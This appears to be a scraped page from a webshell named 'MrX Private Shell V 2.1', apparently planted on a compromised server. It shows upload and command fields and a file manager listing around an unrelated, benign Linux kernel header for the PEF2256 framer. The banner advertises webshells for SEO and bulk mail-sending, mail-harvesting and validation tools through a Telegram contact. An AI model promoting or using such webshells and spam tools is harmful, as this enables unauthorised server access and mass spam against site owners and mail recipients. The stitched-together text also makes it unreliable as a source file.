__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/* SPDX-License-Identifier: GPL-2.0-or-later */
/*
 * PEF2256 consumer API
 *
 * Copyright 2023 CS GROUP France
 *
 * Author: Herve Codina <[email protected]>
 */
#ifndef __PEF2256_H__
#define __PEF2256_H__

#include <linux/types.h>

struct pef2256;
struct regmap;

/* Retrieve the PEF2256 regmap */
struct regmap *pef2256_get_regmap(struct pef2256 *pef2256);

/* PEF2256 hardware versions */
enum pef2256_version {
	PEF2256_VERSION_UNKNOWN,
	PEF2256_VERSION_1_2,
	PEF2256_VERSION_2_1,
	PEF2256_VERSION_2_2,
};

/* Get the PEF2256 hardware version */
enum pef2256_version pef2256_get_version(struct pef2256 *pef2256);

#endif /* __PEF2256_H__ */

Filemanager

Name Type Size Permission Actions
framer-provider.h File 5.58 KB 0644
framer.h File 5.12 KB 0644
pef2256.h File 653 B 0644
Filemanager